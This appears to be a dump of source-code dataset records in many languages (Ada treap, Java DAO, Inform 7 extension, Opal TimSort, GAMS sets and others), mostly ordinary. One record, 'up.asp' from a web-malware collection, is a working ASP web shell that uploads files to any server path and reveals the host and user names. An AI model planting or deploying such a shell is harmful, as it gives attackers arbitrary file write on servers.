content
stringlengths
4
1.04M
lang
stringclasses
358 values
score
int64
0
5
repo_name
stringlengths
5
114
repo_path
stringlengths
4
229
repo_licenses
sequencelengths
1
8
require("socket") class TCPSocket { """ TCP Socket class. """ forwards_unary_ruby_methods def TCPSocket open: server port: port { """ @server Server hostname to open Socket on. @port Server port to open Socket on. Creates and opens a new @TCPSocket@ on @server and @port. """ open(server, port) } def send: msg flags: flags (0) { send(msg, flags) } def recv: maxlen { recv(maxlen) } def read: n { read(n) } }
Fancy
4
bakkdoor/fancy
lib/rbx/tcp_socket.fy
[ "BSD-3-Clause" ]
with Ada.Unchecked_Deallocation; package body Tree_Naive_Pointers is procedure initialize is begin Reset(g); end; procedure make_node(n: out NodePtr; x: Integer) is begin n := new Node; n.x := x; n.y := Random(g); end make_node; procedure delete_node(n: in out NodePtr) is procedure free is new Ada.Unchecked_Deallocation(Object => Node, Name => NodePtr); begin if n /= null then if n.left /= null then delete_node(n.left); end if; if n.right /= null then delete_node(n.right); end if; free(n); end if; end delete_node; function merge(lower, greater: NodePtr) return NodePtr is begin if lower = null then return greater; end if; if greater = null then return lower; end if; if lower.y < greater.y then lower.right := merge(lower.right, greater); return lower; else greater.left := merge(lower, greater.left); return greater; end if; end merge; function merge(lower, equal, greater: NodePtr) return NodePtr is begin return merge(merge(lower, equal), greater); end merge; procedure split(orig: NodePtr; lower, greaterOrEqual: in out NodePtr; val: Integer) is begin if orig = null then lower := null; greaterOrEqual := null; return; end if; if orig.x < val then lower := orig; split(lower.right, lower.right, greaterOrEqual, val); else greaterOrEqual := orig; split(greaterOrEqual.left, lower, greaterOrEqual.left, val); end if; end split; procedure split(orig: NodePtr; lower, equal, greater: in out NodePtr; val: Integer) is equalOrGreater: NodePtr; begin split(orig, lower, equalOrGreater, val); split(equalOrGreater, equal, greater, val + 1); end split; function hasValue(t: in out Tree; x: Integer) return Boolean is lower, equal, greater: NodePtr; result: Boolean; begin split(t.root, lower, equal, greater, x); result := equal /= null; t.root := merge(lower, equal, greater); return result; end hasValue; procedure insert(t: in out Tree; x: Integer) is lower, equal, greater: NodePtr; begin split(t.root, lower, equal, greater, x); if equal = null then make_node(equal, x); end if; t.root := merge(lower, equal, greater); end insert; procedure erase(t: in out Tree; x: Integer) is lower, equal, greater: NodePtr; begin split(t.root, lower, equal, greater, x); t.root := merge(lower, greater); -- commenting out the following line -- doesn't seem to affect running time by much, if at all delete_node(equal); end erase; end Tree_Naive_Pointers;
Ada
5
r00ster91/completely-unscientific-benchmarks
ada/tree_naive_pointers.adb
[ "Apache-2.0", "MIT" ]
package com.macro.mall.dao; import com.macro.mall.dto.OmsOrderDeliveryParam; import com.macro.mall.dto.OmsOrderDetail; import com.macro.mall.dto.OmsOrderQueryParam; import com.macro.mall.model.OmsOrder; import org.apache.ibatis.annotations.Param; import java.util.List; /** * 订单查询自定义Dao * Created by macro on 2018/10/12. */ public interface OmsOrderDao { /** * 条件查询订单 */ List<OmsOrder> getList(@Param("queryParam") OmsOrderQueryParam queryParam); /** * 批量发货 */ int delivery(@Param("list") List<OmsOrderDeliveryParam> deliveryParamList); /** * 获取订单详情 */ OmsOrderDetail getDetail(@Param("id") Long id); }
Java
4
nowinli/mall
mall-admin/src/main/java/com/macro/mall/dao/OmsOrderDao.java
[ "Apache-2.0" ]
Version 3/190914 of Vorple Modal Windows (for Glulx only) by Juhana Leinonen begins here. "Modal windows are dialog prompts or other information windows that pop up on top of the play area and require user action to dismiss." Include version 3 of Vorple by Juhana Leinonen. Use authorial modesty. Chapter 1 - Modal windows To show a/-- modal window reading (content - text), without pausing: let modal message be escaped content using "\n" as line breaks; if Vorple is not supported: say "[content][paragraph break]"; if without pausing: execute JavaScript code "vorple.layout.block();vorple.prompt.hide();vex.closeAll();vex.dialog.open({message:'[modal message]',buttons:[bracket]vex.dialog.buttons.YES[close bracket],callback:function(){vorple.layout.unblock();vorple.prompt.unhide()}})"; otherwise: execute JavaScript code "vorple.layout.block();vorple.prompt.hide();vex.closeAll();vex.dialog.open({message:'[modal message]',buttons:[bracket]vex.dialog.buttons.YES[close bracket],callback:function(){vorple.layout.unblock();vorple.prompt.unhide();vorple.prompt.queueKeypress(' ')}})"; wait for any key. To show a/-- modal window: show a modal window reading "", without pausing. To set output focus to the/-- modal window: set output focus to the element called "vex-dialog-message". Chapter 2 - Waiting for keypress (for use without Basic Screen Effects by Emily Short) To wait for any key: (- KeyPause(); -). Include (- [ KeyPause key; while ( 1 ) { key = VM_KeyChar(); if ( key == -4 or -5 or -10 or -11 or -12 or -13 ) { continue; } rfalse; } ]; -). Vorple Modal Windows ends here. ---- DOCUMENTATION ---- A modal window is a screen that pops up on top of the interpreter with text content and a button that closes the modal. Chapter: Simple modals A modal window with plain text content can be created with: show a modal window reading "Hello World!"; The modal pops up with the text and an OK button and waits for the player to either click on the button, press enter, space or esc, or click somewhere outside the modal window. By default the game will pause to wait for the user to dismiss the modal window. This behavior can be switched off with a "without pausing" option: show a modal window reading "Merry Christmas!", without pausing; say "And a happy new year!"; In the above example the modal doesn't pause the game, so the player can see the text "And a happy new year" printed immediately in the game's normal text flow below the modal window. Without the "without pausing" option the text would appear only after dismissing the modal. Chapter: Modals with styled content The "show a modal window reading ..." lets us show only plain text, but if we want more complex content, we can open the modal without any content and then redirect all following output to it. Anything between phrases "set output focus to the modal window" and "set output focus to the main window" is printed inside the modal. show a modal window; set output focus to the modal window; say "[bold type]Welcome![roman type]"; place the image "Cover.jpg" with description "Cover page", centered; set output focus to the main window; wait for any key; ("Place the image" phrase is from the Vorple Multimedia extension.) Note that when creating a modal window this way we should "wait for any key" after creating the modal so that the game pauses to wait for the player to act. Example: * The Greeter - Showing a modal at the start of the play This basic example pops up the modal when the play begins and displays the story title and some basic gameplay instructions. *: "The Greeter" Include Vorple Modal Windows by Juhana Leinonen. Release along with the "Vorple" interpreter. There is a room. When play begins: show a modal window reading "Welcome to [story title]! Use LOOK to look around, EXAMINE what you see, and TAKE what you can!". Example: ** Version Popup - Showing the version information in a modal window We have two rules here that cause the normal banner to show in a modal instead of in the story text. The first check rule shows a modal window and sets the output focus to it. From then on everything that the game prints (the banner, in this case) will be printed inside the modal. The second report rule runs after the banner has been printed, resuming output back to the normal flow of the game text. *: "Version Popup" Include Vorple Modal Windows by Juhana Leinonen. Release along with the "Vorple" interpreter. There is a room. Check requesting the story file version: show a modal window; set output focus to the modal window. Report requesting the story file version: set output focus to the main window. Test me with "version".
Inform 7
5
vorple/inform7
Extensions/Juhana Leinonen/Vorple Modal Windows.i7x
[ "CC-BY-4.0" ]
// Main header script - this will be included into every script in // the game (local and global). Do not place functions here; rather, // place import definitions and #define names here to be used by all // scripts.
AGS Script
2
JavascriptID/sourcerer-app
src/test/resources/samples/langs/AGS Script/GlobalScript.ash
[ "MIT" ]
def meh: "meh";
JSONiq
0
aakropotkin/jq
tests/modules/c/d.jq
[ "CC-BY-3.0" ]
new dynamic binaryInsertionSort; new class TimSort { new int MIN_MERGE = 32, MIN_GALLOP = 7, INITIAL_TMP_STORAGE_LENGTH = 256; new method __init__(a, length) { this.a = a; this.len = length; this.tmp = sortingVisualizer.createValueArray((this.len >> 1) if (this.len < 2 * TimSort.INITIAL_TMP_STORAGE_LENGTH) else TimSort.INITIAL_TMP_STORAGE_LENGTH); sortingVisualizer.setAux(this.tmp); this.minGallop = TimSort.MIN_GALLOP; this.stackSize = 0; new int stackLen = 5 if (this.len < 120) else (10 if (this.len < 1542) else (19 if (this.len < 119151) else 40)); this.runBase = [0 for _ in range(stackLen)]; this.runLen = [0 for _ in range(stackLen)]; } new method sort(a, lo, hi) { new int nRemaining = hi - lo; if nRemaining < TimSort.MIN_MERGE { new int initRunLen; initRunLen = this.countRunAndMakeAscending(a, lo, hi); this.binarySort(a, lo, hi, lo + initRunLen); return; } new int minRun = TimSort.minRunLength(nRemaining); do nRemaining != 0 { new int runLen; runLen = this.countRunAndMakeAscending(a, lo, hi); if runLen < minRun { new int force = nRemaining if (nRemaining <= minRun) else minRun; this.binarySort(a, lo, lo + force, lo + runLen); runLen = force; } this.pushRun(lo, runLen); this.mergeCollapse(); lo += runLen; nRemaining -= runLen; } this.mergeForceCollapse(); } new method binarySort(a, lo, hi, start) { binaryInsertionSort(a, min(lo, start), hi); } new method countRunAndMakeAscending(a, lo, hi) { new int runHi = lo + 1; if runHi == hi { return 1; } if a[runHi] < a[lo] { runHi++; for ; runHi < hi and a[runHi] < a[runHi - 1]; runHi++ {} this.reverseRange(a, lo, runHi); } else { runHi++; for ; runHi < hi and a[runHi] >= a[runHi - 1]; runHi++ {} } return runHi - lo; } new method reverseRange(a, lo, hi) { reverse(a, lo, hi); } new classmethod minRunLength(n) { new int r = 0; while n >= TimSort.MIN_MERGE { r |= (n & 1); n >>= 1; } return n + r; } new method pushRun(runBase, runLen) { this.runBase[this.stackSize] = runBase; this.runLen[this.stackSize] = runLen; this.stackSize++; } new method mergeCollapse() { while this.stackSize > 1 { new int n = this.stackSize - 2; if (n >= 1 and this.runLen[n - 1] <= this.runLen[n] + this.runLen[n + 1]) or (n >= 2 and this.runLen[n - 2] <= this.runLen[n] + this.runLen[n - 1]) { if this.runLen[n - 1] < this.runLen[n + 1] { n--; } } elif this.runLen[n] > this.runLen[n + 1] { break; } this.mergeAt(n); } } new method mergeForceCollapse() { while this.stackSize > 1 { new int n = this.stackSize - 2; if n > 0 and this.runLen[n - 1] < this.runLen[n + 1] { n--; } this.mergeAt(n); } } new method mergeAt(i) { new int base1 = this.runBase[i], len1 = this.runLen[i], base2 = this.runBase[i + 1], len2 = this.runLen[i + 1]; this.runLen[i] = len1 + len2; if i == this.stackSize - 3 { this.runBase[i + 1] = this.runBase[i + 2]; this.runLen[i + 1] = this.runLen[i + 2]; } this.stackSize--; new int k; k = this.gallopRight(this.a[base2], this.a, base1, len1, 0); base1 += k; len1 -= k; if len1 == 0 { return; } len2 = this.gallopLeft(this.a[base1 + len1 - 1], this.a, base2, len2, len2 - 1); if len2 == 0 { return; } if len1 <= len2 { this.mergeLo(base1, len1, base2, len2); } else { this.mergeHi(base1, len1, base2, len2); } } new method gallopLeft(key, a, base, len, hint) { new int lastOfs = 0, ofs = 1; if key > a[base + hint] { new int maxOfs = len - hint; while ofs < maxOfs and key > a[base + hint + ofs] { lastOfs = ofs; ofs = (ofs * 2) + 1; if ofs <= 0 { ofs = maxOfs; } } if ofs > maxOfs { ofs = maxOfs; } lastOfs += hint; ofs += hint; } else { new int maxOfs = hint + 1; while ofs < maxOfs and key <= a[base + hint - ofs] { lastOfs = ofs; ofs = (ofs * 2) + 1; if ofs <= 0 { ofs = maxOfs; } } if ofs > maxOfs { ofs = maxOfs; } new int tmp = lastOfs; lastOfs = hint - ofs; ofs = hint - tmp; } lastOfs++; while lastOfs < ofs { new int m = lastOfs + ((ofs - lastOfs) >> 1); if key > a[base + m] { lastOfs = m + 1; } else { ofs = m; } } return ofs; } new method gallopRight(key, a, base, len, hint) { new int ofs = 1, lastOfs = 0; if key < a[base + hint] { new int maxOfs = hint + 1; while ofs < maxOfs and key < a[base + hint - ofs] { lastOfs = ofs; ofs = (ofs * 2) + 1; if ofs <= 0 { ofs = maxOfs; } } if ofs > maxOfs { ofs = maxOfs; } new int tmp = lastOfs; lastOfs = hint - ofs; ofs = hint - tmp; } else { new int maxOfs = len - hint; while ofs < maxOfs and key >= a[base + hint + ofs] { lastOfs = ofs; ofs = (ofs * 2) + 1; if ofs <= 0 { ofs = maxOfs; } } if ofs > maxOfs { ofs = maxOfs; } lastOfs += hint; ofs += hint; } lastOfs++; while lastOfs < ofs { new int m = lastOfs + ((ofs - lastOfs) >> 1); if key < a[base + m] { ofs = m; } else { lastOfs = m + 1; } } return ofs; } new method mergeLo(base1, len1, base2, len2) { new list a = this.a, tmp = this.ensureCapacity(len1); arrayCopy(a, base1, tmp, 0, len1); new int cursor1 = 0, cursor2 = base2, dest = base1; a[dest].write(a[cursor2]); dest++; cursor2++; len2--; if len2 == 0 { arrayCopy(tmp, cursor1, a, dest, len1); return; } if len1 == 1 { arrayCopy(a, cursor2, a, dest, len2); a[dest + len2].write(tmp[cursor1]); return; } new int minGallop = this.minGallop; new bool breakOuter = False; while True { new int count1 = 0, count2 = 0; do (count1 | count2) < minGallop { if a[cursor2] < tmp[cursor1] { a[dest].write(a[cursor2]); cursor2++; dest++; count2++; count1 = 0; len2--; if len2 == 0 { breakOuter = True; break; } } else { a[dest].write(tmp[cursor1]); dest++; cursor1++; count1++; count2 = 0; len1--; if len1 == 1 { breakOuter = True; break; } } } if breakOuter { break; } do count1 >= TimSort.MIN_GALLOP | count2 >= TimSort.MIN_GALLOP { count1 = this.gallopRight(a[cursor2], tmp, cursor1, len1, 0); if count1 != 0 { arrayCopy(tmp, cursor1, a, dest, count1); dest += count1; cursor1 += count1; len1 -= count1; if len1 <= 1 { breakOuter = True; break; } } a[dest].write(a[cursor2]); dest++; cursor2++; len2--; if len2 == 0 { breakOuter = True; break; } count2 = this.gallopLeft(tmp[cursor1], a, cursor2, len2, 0); if count2 != 0 { arrayCopy(a, cursor2, a, dest, count2); dest += count2; cursor2 += count2; len2 -= count2; if len2 == 0 { breakOuter = True; break; } } a[dest].write(tmp[cursor1]); dest++; cursor1++; len1--; if len1 == 1 { breakOuter = True; break; } minGallop--; } if breakOuter { break; } if minGallop < 0 { minGallop = 0; } minGallop += 2; } this.minGallop = 1 if (minGallop < 1) else minGallop; if len1 == 1 { arrayCopy(a, cursor2, a, dest, len2); a[dest + len2].write(tmp[cursor1]); } elif (len1 == 0) { IO.out("Comparison method violates its general contract!\n"); return; } else { arrayCopy(tmp, cursor1, a, dest, len1); } } new method mergeHi(base1, len1, base2, len2) { new list a = this.a, tmp = this.ensureCapacity(len2); arrayCopy(a, base2, tmp, 0, len2); new int cursor1 = base1 + len1 - 1, cursor2 = len2 - 1, dest = base2 + len2 - 1; a[dest].write(a[cursor1]); dest--; cursor1--; len1--; if len1 == 0 { reverseArrayCopy(tmp, 0, a, dest - (len2 - 1), len2); return; } if len2 == 1 { dest -= len1; cursor1 -= len1; reverseArrayCopy(a, cursor1 + 1, a, dest + 1, len1); a[dest].write(tmp[cursor2]); return; } new int minGallop = this.minGallop; new bool breakOuter = False; while True { new int count1 = 0, count2 = 0; do (count1 | count2) < minGallop { if tmp[cursor2] < a[cursor1] { a[dest].write(a[cursor1]); dest--; cursor1--; count1++; count2 = 0; len1--; if len1 == 0 { breakOuter = True; break; } } else { a[dest].write(tmp[cursor2]); dest--; cursor2--; count2++; count1 = 0; len2--; if len2 == 1 { breakOuter = True; break; } } } if breakOuter { break; } do count1 >= TimSort.MIN_GALLOP | count2 >= TimSort.MIN_GALLOP { count1 = len1 - this.gallopRight(tmp[cursor2], a, base1, len1, len1 - 1); if count1 != 0 { dest -= count1; cursor1 -= count1; len1 -= count1; reverseArrayCopy(a, cursor1 + 1, a, dest + 1, count1); if len1 == 0 { breakOuter = True; break; } } a[dest].write(tmp[cursor2]); dest--; cursor2--; len2--; if len2 == 1 { breakOuter = True; break; } count2 = len2 - this.gallopLeft(a[cursor1], tmp, 0, len2, len2 - 1); if count2 != 0 { dest -= count2; cursor2 -= count2; len2 -= count2; reverseArrayCopy(tmp, cursor2 + 1, a, dest + 1, count2); if len2 <= 1 { breakOuter = True; break; } } a[dest].write(a[cursor1]); dest--; cursor1--; len1--; if len1 == 0 { breakOuter = True; break; } minGallop--; } if breakOuter { break; } if minGallop < 0 { minGallop = 0; } minGallop += 2; } this.minGallop = 1 if (minGallop < 1) else minGallop; if len2 == 1 { dest -= len1; cursor1 -= len1; reverseArrayCopy(a, cursor1 + 1, a, dest + 1, len1); a[dest].write(tmp[cursor2]); } elif (len2 == 0) { IO.out("Comparison method violates its general contract!\n"); return; } else { reverseArrayCopy(tmp, 0, a, dest - (len2 - 1), len2); } } new method ensureCapacity(minCapacity) { if len(this.tmp) < minCapacity { new int newSize = minCapacity; newSize |= newSize >> 1; newSize |= newSize >> 2; newSize |= newSize >> 4; newSize |= newSize >> 8; newSize |= newSize >> 16; newSize++; if newSize < 0 { newSize = minCapacity; } else { newSize = min(newSize, this.len >> 1); } new list newArray = sortingVisualizer.createValueArray(newSize); this.tmp = newArray; sortingVisualizer.setAux(this.tmp); } return this.tmp; } } @Sort( "Merge Sorts", "Tim Sort", "Tim Sort" ); new function timSortRun(array) { TimSort(array, len(array)).sort(array, 0, len(array)); }
Opal
5
thatsOven/sorting-visualizer
sorts/TimSort.opal
[ "MIT" ]
<!-- ASP_KIT up.asp = File upload by: Unknown modified: 25/06/2003 --> <% Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") %> <% Response.Buffer = true Function BuildUpload(RequestBin) 'Get the boundary PosBeg = 1 PosEnd = InstrB(PosBeg,RequestBin,getByteString(chr(13))) boundary = MidB(RequestBin,PosBeg,PosEnd-PosBeg) boundaryPos = InstrB(1,RequestBin,boundary) 'Get all data inside the boundaries Do until (boundaryPos=InstrB(RequestBin,boundary & getByteString("--"))) 'Members variable of objects are put in a dictionary object Dim UploadControl Set UploadControl = CreateObject("Scripting.Dictionary") 'Get an object name Pos = InstrB(BoundaryPos,RequestBin,getByteString("Content-Disposition")) Pos = InstrB(Pos,RequestBin,getByteString("name=")) PosBeg = Pos+6 PosEnd = InstrB(PosBeg,RequestBin,getByteString(chr(34))) Name = getString(MidB(RequestBin,PosBeg,PosEnd-PosBeg)) PosFile = InstrB(BoundaryPos,RequestBin,getByteString("filename=")) PosBound = InstrB(PosEnd,RequestBin,boundary) 'Test if object is of file type If PosFile<>0 AND (PosFile<PosBound) Then 'Get Filename, content-type and content of file PosBeg = PosFile + 10 PosEnd = InstrB(PosBeg,RequestBin,getByteString(chr(34))) FileName = getString(MidB(RequestBin,PosBeg,PosEnd-PosBeg)) 'Add filename to dictionary object UploadControl.Add "FileName", FileName Pos = InstrB(PosEnd,RequestBin,getByteString("Content-Type:")) PosBeg = Pos+14 PosEnd = InstrB(PosBeg,RequestBin,getByteString(chr(13))) 'Add content-type to dictionary object ContentType = getString(MidB(RequestBin,PosBeg,PosEnd-PosBeg)) UploadControl.Add "ContentType",ContentType 'Get content of object PosBeg = PosEnd+4 PosEnd = InstrB(PosBeg,RequestBin,boundary)-2 Value = MidB(RequestBin,PosBeg,PosEnd-PosBeg) Else 'Get content of object Pos = InstrB(Pos,RequestBin,getByteString(chr(13))) PosBeg = Pos+4 PosEnd = InstrB(PosBeg,RequestBin,boundary)-2 Value = getString(MidB(RequestBin,PosBeg,PosEnd-PosBeg)) End If UploadControl.Add "Value" , Value UploadRequest.Add name, UploadControl BoundaryPos=InstrB(BoundaryPos+LenB(boundary),RequestBin,boundary) Loop End Function %> <% Function getByteString(StringStr) For i = 1 to Len(StringStr) char = Mid(StringStr,i,1) getByteString = getByteString & chrB(AscB(char)) Next End Function %> <% Function getString(StringBin) getString ="" For intCount = 1 to LenB(StringBin) getString = getString & chr(AscB(MidB(StringBin,intCount,1))) Next End Function %> <% If request("ok")="1" then Response.Clear byteCount = Request.TotalBytes RequestBin = Request.BinaryRead(byteCount) Set UploadRequest = CreateObject("Scripting.Dictionary") BuildUpload(RequestBin) If UploadRequest.Item("fichero").Item("Value") <> "" Then contentType = UploadRequest.Item("fichero").Item("ContentType") filepathname = UploadRequest.Item("fichero").Item("FileName") filename = Right(filepathname,Len(filepathname)-InstrRev(filepathname,"\")) value = UploadRequest.Item("fichero").Item("Value") path = UploadRequest.Item("path").Item("Value") filename = path & filename Set MyFileObject = Server.CreateObject("Scripting.FileSystemObject") Set objFile = MyFileObject.CreateTextFile(filename) For i = 1 to LenB(value) objFile.Write chr(AscB(MidB(value,i,1))) Next objFile.Close Set objFile = Nothing Set MyFileObject = Nothing End If Set UploadRequest = Nothing End If %> <HTML> <BODY> <FORM action="?ok=1" method="POST" ENCTYPE="multipart/form-data"> <INPUT TYPE="file" NAME="fichero"> <INPUT TYPE="submit" Value="Upload"> <br>Target PATH:<br><INPUT TYPE="text" Name="path" Value="C:\"> </FORM> <PRE> <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %> <br> File: <%=filename%> </HTML> </BODY>
ASP
3
laotun-s/webshell
web-malware-collection-13-06-2012/ASP/up.asp
[ "MIT" ]
// Copyright 2010-2016 RethinkDB, all rights reserved. #ifndef CRYPTO_COMPARE_HPP #define CRYPTO_COMPARE_HPP #include <openssl/crypto.h> #include <array> namespace crypto { template <std::size_t N> inline bool compare_equal( std::array<unsigned char, N> const &lhs, std::array<unsigned char, N> const &rhs) { return CRYPTO_memcmp(lhs.data(), rhs.data(), lhs.size()) == 0; } } // namespace crypto #endif // CRYPTO_COMPARE_HPP
C++
4
zadcha/rethinkdb
src/crypto/compare_equal.hpp
[ "Apache-2.0" ]
[lightning] table-concurrency = 1 [checkpoint] enable = true schema = "tidb_lightning_checkpoint_test_cppk" driver = "mysql" keep-after-success = "origin" [mydumper] read-block-size = 1
TOML
2
Howie59/tidb
br/tests/lightning_checkpoint/config.toml
[ "Apache-2.0", "BSD-3-Clause" ]
*--------------------------------------------------------------------------------- * * IO73-sector sets * *--------------------------------------------------------------------------------- set ns73 "Industries in national accounting definition, 73 sectors" / 01000 " 1 Agriculture and horticulture" 02000 " 2 Forestry" 03000 " 3 Fishing" 0600a " 4a Extration of oil" 0600b " 4b Extraction of gas (incl. coalimport)" 08090 " 4c Extraction of gravel and stone and mining support service activities" 10120 " 5 Manufacture of food products, beverages and tobacco" 13150 " 6 Textiles and leather products" 16000 " 7 Manufacture of wood and wood products" 17000 " 8 Manufacture of paper and paper products" 18000 " 9 Printing etc." 19000 "10 Oil refinery etc." 20000 "11 Manufacture of chemicals" 21000 "12 Pharmaceuticals" 22000 "13 Manufacture of rubber and plastic products" 23000 "14 Manufacture of other non-metallic mineral products" 24000 "15 Manufacture of basic metals" 25000 "16 Manufacture of fabricated metal products" 26000 "17 Manufacture of electronic components" 27000 "18 Electrical equipment" 28000 "19 Manufacture of machinery" 29000 "20 Manufacture of motor vehicles and related parts" 30000 "21 Manufacture of ships and other transport equipment" 31320 "22 Manufacture of furniture and other manufacturing" 33000 "23 Repair and installation of machinery and equipment" 35001 "24a Production and distribution of electricity" 35002 "24b Manufacture and distribution of gas" 35003 "24c Steam and hot water supply" 36000 "25 Water collection, purification and supply" 37390 "26 Sewerage; waste collection, treatment and disposal activities etc." 41430 "27 Construction" 45000 "28 Wholesale and retail trade and repair of motor vehicles and motorcycles" 46000 "29 Wholesale" 47000 "30 Retail sale" 49000 "31 Land transport and transport via pipelines" 50000 "32 Water transport" 51000 "33 Air transport" 52000 "34 Support activities for transportation" 53000 "35 Postal and courier activities" 55560 "36 Accommodation and food service activities" 58000 "37 Publishing activities" 59600 "38 Motion picture and television programme prod., sound recording; radio and televisi" 61000 "39 Telecommunications" 62630 "40 IT and information service activities" 64000 "41 Financial service activities, except insurance and pension funding" 65000 "42 Insurance and pension funding" 66000 "43 Other financial activities" 68100 "44 Buying and selling of real estate" 68300 "45 Renting of non-residential buildings" 68203 "46 Renting of residential buildings" 68204 "47 Owner-occupied dwellings" 69700 "48 Legal and accounting activities; activities of head offices; management consultanc" 71000 "49 Architectural and engineering activities" 72001 "50 Scientific research and development (market)" 72002 "51 Scientific research and development (non-market)" 73000 "52 Advertising and market research" 74750 "53 Other professional, scientific and technical activities; veterinary activities" 77000 "54 Rental and leasing activities" 78000 "55 Employment activities" 79000 "56 Travel agent activities" 80820 "57 Security and investigation; services to buildings and landscape; other businness s" 84202 "58 Public administration etc." 84101 "59 Rescue service etc. (market)" 85202 "60 Education (non-market)" 85101 "61 Education (market)" 86000 "62 Human health activities" 87880 "63 Residential care" 90920 "64 Arts and entertainment; libraries, museums and other cultural activities; gambling" 93000 "65 Sports activities and amusement and recreation activities" 94000 "66 Activities of membership organisations" 95000 "67 Repair of personal goods" 96000 "68 Other personal service activities" 97000 "69 Activities of households as employers of domestic personnel" /; set nc74 "Consumption categories in national accounting defintion" / 01110 "1 Mel, gryn, brød og kager" 01120 "2 Kød" 01130 "3 Fisk" 01141 "4 Æg" 01142 "5 Mælk, fløde, yoghurt mv." 01143 "6 Ost" 01150 "7 Smør, margarine og olie mv." 01167 "8 Frugt og grøntsager" 01179 "9 Kartofler mv." 01181 "10 Sukker" 01182 "11 Flødeis, chokolade og sukkervarer" 01190 "12 Salt, krydderier, supper mv." 01210 "13 Kaffe, the og kakao" 01220 "14 Mineralvand og sodavand" 02112 "15 Vin og spiritus" 02130 "16 Øl" 02900 "17 Tobak mm." 03113 "18 Beklædning" 03140 "19 Vask, rensning" 03200 "20 Fodtøj" 04100 "21 Husleje" 04200 "22 Beregnet husleje af egen bolig" 04300 "23 Reparation og vedligeholdelse af boliger" 04401 "24 Vand og vandafledningsafgift" 04402 "25 Renovation mv." 04510 "26 Elektricitet" 04520 "27 Gas" 04530 "28 Flydende brændsel" 04545 "29 Fjernvarme mv." 05100 "30 Møbler og gulvtæpper mv." 05200 "31 Gardiner, sengelinned mv." 05312 "32 Husholdningsmaskiner" 05330 "33 Rep. af husholdningsmaskiner" 05400 "34 Service, køkkenudstyr" 05500 "35 Husholdnings- og haveredskaber" 05610 "36 Rengøringsmidler mv." 05620 "37 Hushjælp mv." 06112 "38 Medicin, vitaminer mv." 06130 "39 Briller, høreapparater mv." 06200 "40 Læge, tandlæge mv." 06300 "41 Hospitaler, sanatorier mv." 07100 "42 Anskaffelse af køretøjer" 07213 "43 Vedligeholdelse af køretøjer" 07220 "44 Benzin og olie til køretøjer" 07240 "45 Biludlejning, køretimer mv." 07300 "46 Køb af transportydelser" 08100 "47 Post" 08200 "48 Teleudstyr" 08300 "49 Teleservice" 09110 "50 Radio- og tv-apparater mv." 09120 "51 Fotoudstyr, videokameraer mv." 09130 "52 pC'ere mv." 09140 "53 CD'ere, videobånd mv." 09150 "54 Reparation af radio, TV og pC mv." 09200 "55 Musikinstrumenter, både mv." 09300 "56 Sportsudstyr, legetøj, kæledyr mv." 09400 "57 Forlystelser, TV-licens mv." 09513 "58 Bøger, aviser og blade" 09540 "59 Papir og skriveudstyr mv." 09600 "60 Pakkede ferierejser" 10000 "61 Undervisning" 11100 "62 Udgifter på restauranter mv." 11200 "63 Udgifter til hoteller mv." 12110 "64 Frisører mv." 12123 "65 Toiletartikler, barbermaskiner mv." 12310 "66 Smykker og ure mv." 12320 "67 Kufferter, tasker mv." 12401 "68 Plejehjem, dagcentre mv." 12402 "69 Daginstitutioner for børn" 12500 "70 Forsikring" 12600 "71 Finansielle tjenesteydelser" 12700 "72 Advokater, andre tjenesteydelser" 99800 "73 Turistindtægter mv." 99900 "74 Turistudgifter mv." /; set ng29 "Public consumption categories in national accounting defintion" / *Markedsmæssigt individuelt offentligt konsum 01190 "1(12) Salt, krydderier, supper mv." 03200 "2(20) Fodtøj" 04300 "3(23) Rep og vedl. af boliger" 05100 "4(30) Møbler og gulvtæpper mv." 05200 "5(31) Gardiner, sengelinned mv." 05620 "6(37) Hushjælp mv." 06112 "7(38) Medicin, vitaminer mv." 06130 "8(39) Briller, høreapparater mv" 06200 "9(40) Læge, tandlæge mv." 06300 "10(41) Hospitaler, sanatorier mv." 07100 "11(42) Anskaffelse af køretøjer" 07300 "12(46) Køb af transportydelser" 09130 "13(52) pC'ere mv." 09400 "14(57) Forlystelser, TV-licens mv." 10000 "15(61) Undervisning" 12123 "16(65) Toiletartikler, mv." 12401 "17(68) Plejehjem, dagcentre mv." 12402 "18(69) Daginstitutioner for børn" 12500 "19(70) Forsikring" 32010 "20 Generelle offentlige tjenester" 32020 "21 Forsvar" 32030 "22 Offentlig orden og sikkerhed" 32040 "23 Økonomiske forhold" 32050 "24 Miljøbeskyttelse" 32060 "25 Bolig- og fælles faciliteter" 32070 "26 Sundhed" 32080 "27 Fritids-, kultur- og religiøse tjenester" 32090 "28 Uddannelse" 32100 "29 Social sikring" /; set npi5 "Primary inputs in national accounting definition" / nTp "Commodity taxes, net" nTv "VAT" nTo "Other production taxes net (empty at constant or previous year's prices)" nW "Compensation of employees (empty at constant or previous year's prices)" nCap "Gross operating surplus and mixed income" /; set num5 "Unclassified imports in national accounting definition" / e "Transaktioner vedr. olieaktivitet i Nordsø" t "Turistindtægter og -udgifter etc." qs "Danske skibes udgifter i fremmede havne" p "Uspec. import i.a.n." o "Uspec. off. import" /; set nz2 "Mapping residual posts from national accounts to DREAM" / kn "Nettoanskaf. af værdigenstande" l "Lager ændringer" /; # set # u "Uddannelsesgrupper" / # uu 'Ufaglært' # ue 'Erhvervsfaglig uddannelse' # uvk 'Kort videregående uddannelse' # uvm 'Mellemlang videregående uddannelse' # uvl 'Lang videregående uddannelse' # / # ; *------------ * Alias *------------ alias(ns73,ns73r); alias(ns73,ns73c); # alias(u,ua);
GAMS
3
gemal/MAKRO
Model/Sets/IO73.sets.gms
[ "MIT" ]
load "common.gnu" data = "../data/set_difference.csv" set output dir."set_difference".ext set title "set difference" plot data using 1:2, for [i=3:21] '' using 1:i
Gnuplot
2
jafingerhut/bifurcan
benchmarks/gnuplot/set_difference.gnu
[ "MIT" ]
